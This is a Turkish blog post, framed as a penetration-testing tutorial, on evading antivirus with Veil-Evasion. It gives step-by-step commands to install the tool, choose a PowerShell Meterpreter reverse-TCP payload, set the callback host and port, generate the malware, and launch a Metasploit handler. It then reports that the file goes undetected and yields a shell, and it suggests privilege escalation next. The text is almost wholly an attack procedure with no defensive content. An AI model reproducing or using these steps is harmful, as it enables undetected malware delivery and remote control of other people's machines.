Veil Framework ile Antivirüslerin Atlatılması

Sızma Testleri sırasında hedef makine/makineler antivirüs yazılımlarla korunuyor olabilir.Bu yazılımları aşarak shell açmak gerekir.Burada imdadımıza Veil çatısı altında bulunan veil-evasion aracı yetişmektedir.Bu tarz yazılımlar temelde çeşitli encoding yöntemleri kullanarak antivirüs yazılımları atlatırlar.

Kurulum:

git clone https://github.com/Veil-Framework/Veil-Evasion veil
cd veil/setup
./setup.sh

Kurulum işlemi tamamlandıktan sonra veil dizini altında “Veil-Evasion.py” dosyasını çalıştıralım.

 

Karşımıza çıkan ekranda 51 adet payload bulunduğu bilgisini alıyoruz.Payload listesi için;

[menu>>]:list

komutunu kullanıyoruz.

Yukarıdaki resimde görüldüğü üzere C, C#, GO, Python, Ruby, Powershell gibi diller kullanarak oluşturulabilen payloadlar mevcut.Ben 24. payload’ı seçeceğim.Tıpkı metasploitte olduğu gibi “use Payload_Adı” şeklinde veya payload’ın numarasını yazarakta seçebiliriz.

[menu>>]: use powershell/meterpreter/rev_tcp
veya
[menu>>]: use 24

Payload’ı seçtik şimdi ip ve port bilgisini “set” ile giriyoruz.

[powershell/meterpreter/rev_tcp>>]: set LHOST 172.30.173.134
[powershell/meterpreter/rev_tcp>>]: set LPORT 54321

İp ve port bilgisini verdikten sonra istersek “info” komutu ile payload hakkında bilgi alabiliriz.

Gerekli alanları doldurduktan sonra “generate” komutu ile zararlı yazılımı oluşturuyoruz.

$[powershell/meterpreter/rev_tcp>>]: generate

Çıkan ekranda bize oluşturulacak olan dosyanın adını soruyor.Varsayılan olarak adı payload.

Zararlı yazılım  “/usr/share/veil-output/source/” dizini altında bulunuyor ve eğer istersek işimizi kolaylaştırmak için bir msf scripti bile hazırlamış. msf scripti “/usr/share/veil-output/handlers/” dizini altında bulunuyor.

Kullanmak için;

root@ruger:~# msfconsole -r handler_adi.rc

Şeklinde kullanabiliriz.

Test Zamanı

Hazırladığımız zararlı yazılımı hedefe attığımda explorer hemen güvenlik taraması başlatıyor gördüğünüz gibi 🙂

 

Ama zararlı yazılımı tespit edemiyor. Şaşırdık mı ? 😀

Zararlıyı çalıştırdığımda hemen msfconsole’a bağlantı düşüyor.

 

Ve içerdeyiz dostlar

 

Bundan sonrası sizin hayal gücünüzle sınırlı. Tabi önce hak yükseltme saldırısı 😉

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir